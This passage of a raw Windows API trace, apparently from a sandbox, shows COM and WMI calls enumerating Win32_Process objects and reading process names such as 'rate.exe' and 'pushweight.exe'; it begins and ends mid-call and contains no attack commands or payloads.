This=0x5e8ce78, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.694] WbemDefPath:IUnknown:Release (This=0x5e8ce78) returned 0x3 [0224.694] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.694] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.694] WbemDefPath:IUnknown:Release (This=0x5e8aa50) returned 0x2 [0224.694] WbemDefPath:IUnknown:Release (This=0x5e8aa50) returned 0x1 [0224.694] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.695] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8aa50) returned 0x0 [0224.695] WbemDefPath:IUnknown:AddRef (This=0x5e8aa50) returned 0x3 [0224.695] WbemDefPath:IUnknown:Release (This=0x5e8aa50) returned 0x2 [0224.695] WbemDefPath:IWbemPath:SetText (This=0x5e8aa50, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2464\"") returned 0x0 [0224.695] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.695] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.695] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.695] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.695] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.695] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.695] IWbemClassObject:Get (in: This=0x742a38, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e88a4*=0, plFlavor=0x26e88a8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="rate.exe", varVal2=0x0), pType=0x26e88a4*=8, plFlavor=0x26e88a8*=0) returned 0x0 [0224.695] SysStringByteLen (bstr="rate.exe") returned 0x10 [0224.695] SysStringByteLen (bstr="rate.exe") returned 0x10 [0224.695] IWbemClassObject:Get (in: This=0x742a38, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e88a4*=8, plFlavor=0x26e88a8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="rate.exe", varVal2=0x0), pType=0x26e88a4*=8, plFlavor=0x26e88a8*=0) returned 0x0 [0224.695] SysStringByteLen (bstr="rate.exe") returned 0x10 [0224.696] SysStringByteLen (bstr="rate.exe") returned 0x10 [0224.696] CoTaskMemAlloc (cb=0x4) returned 0x5e8cea8 [0224.696] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cea8, puReturned=0x26dde18 | out: apObjects=0x5e8cea8*=0x742bd0, puReturned=0x26dde18*=0x1) returned 0x0 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742bd0) returned 0x0 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.697] IUnknown:AddRef (This=0x742bd0) returned 0x3 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742bd4) returned 0x0 [0224.697] IMarshal:GetUnmarshalClass (in: This=0x742bd4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.697] IUnknown:Release (This=0x742bd4) returned 0x3 [0224.697] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.697] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.697] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.698] IUnknown:Release (This=0x742bd0) returned 0x2 [0224.698] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.698] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.698] IUnknown:QueryInterface (in: This=0x742bd0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742bd0) returned 0x0 [0224.698] IUnknown:AddRef (This=0x742bd0) returned 0x4 [0224.698] IUnknown:Release (This=0x742bd0) returned 0x3 [0224.698] IUnknown:Release (This=0x742bd0) returned 0x2 [0224.698] CoTaskMemFree (pv=0x5e8cea8) [0224.698] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.698] IUnknown:AddRef (This=0x742bd0) returned 0x3 [0224.698] IWbemClassObject:Get (in: This=0x742bd0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.698] IWbemClassObject:Get (in: This=0x742bd0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2472\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.699] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2472\"") returned 0x66 [0224.699] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2472\"") returned 0x66 [0224.699] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.699] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.699] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.699] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.700] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cea8) returned 0x0 [0224.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cea8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.700] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cea8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8ab30) returned 0x0 [0224.700] WbemDefPath:IUnknown:Release (This=0x5e8cea8) returned 0x0 [0224.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8ab30) returned 0x0 [0224.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.700] WbemDefPath:IUnknown:AddRef (This=0x5e8ab30) returned 0x3 [0224.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8ceb8) returned 0x0 [0224.701] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8ceb8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.701] WbemDefPath:IUnknown:Release (This=0x5e8ceb8) returned 0x3 [0224.701] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.701] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.701] WbemDefPath:IUnknown:Release (This=0x5e8ab30) returned 0x2 [0224.701] WbemDefPath:IUnknown:Release (This=0x5e8ab30) returned 0x1 [0224.701] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.701] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ab30, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8ab30) returned 0x0 [0224.701] WbemDefPath:IUnknown:AddRef (This=0x5e8ab30) returned 0x3 [0224.701] WbemDefPath:IUnknown:Release (This=0x5e8ab30) returned 0x2 [0224.701] WbemDefPath:IWbemPath:SetText (This=0x5e8ab30, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2472\"") returned 0x0 [0224.701] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.701] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.701] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.701] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.701] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.702] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.702] IWbemClassObject:Get (in: This=0x742bd0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e9108*=0, plFlavor=0x26e910c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pushweight.exe", varVal2=0x0), pType=0x26e9108*=8, plFlavor=0x26e910c*=0) returned 0x0 [0224.702] SysStringByteLen (bstr="pushweight.exe") returned 0x1c [0224.702] SysStringByteLen (bstr="pushweight.exe") returned 0x1c [0224.702] IWbemClassObject:Get (in: This=0x742bd0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e9108*=8, plFlavor=0x26e910c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pushweight.exe", varVal2=0x0), pType=0x26e9108*=8, plFlavor=0x26e910c*=0) returned 0x0 [0224.702] SysStringByteLen (bstr="pushweight.exe") returned 0x1c [0224.702] SysStringByteLen (bstr="pushweight.exe") returned 0x1c [0224.702] CoTaskMemAlloc (cb=0x4) returned 0x5e8cee8 [0224.702] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cee8, puReturned=0x26dde18 | out: apObjects=0x5e8cee8*=0x742d68, puReturned=0x26dde18*=0x1) returned 0x0 [0224.791] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742d68) returned 0x0 [0224.791] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.791] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.791] IUnknown:AddRef (This=0x742d68) returned 0x3 [0224.791] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.791] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.791] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742d6c) returned 0x0 [0224.791] IMarshal:GetUnmarshalClass (in: This=0x742d6c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.791] IUnknown:Release (This=0x742d6c) returned 0x3 [0224.791] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.792] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.792] IUnknown:QueryInterface (in: This=0x742d68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.792] IUnknown:Release (This=0x742d68) returned 0x2 [0224.792] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.792] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.792] IUnknown:QueryInterface (in: This=0x742d68, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742d68) returned 0x0 [0224.792] IUnknown:AddRef (This=0x742d68) returned 0x4 [0224.792] IUnknown:Release (This=0x742d68) returned 0x3 [0224.792] IUnknown:Release (This=0x742d68) returned 0x2 [0224.792] CoTaskMemFree (pv=0x5e8cee8) [0224.792] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.792] IUnknown:AddRef (This=0x742d68) returned 0x3 [0224.792] IWbemClassObject:Get (in: This=0x742d68, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.793] IWbemClassObject:Get (in: This=0x742d68, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2480\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.793] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2480\"") returned 0x66 [0224.793] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2480\"") returned 0x66 [0224.793] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.793] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.793] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.793] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.794] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cee8) returned 0x0 [0224.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cee8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.795] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cee8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8ac10) returned 0x0 [0224.795] WbemDefPath:IUnknown:Release (This=0x5e8cee8) returned 0x0 [0224.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8ac10) returned 0x0 [0224.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: 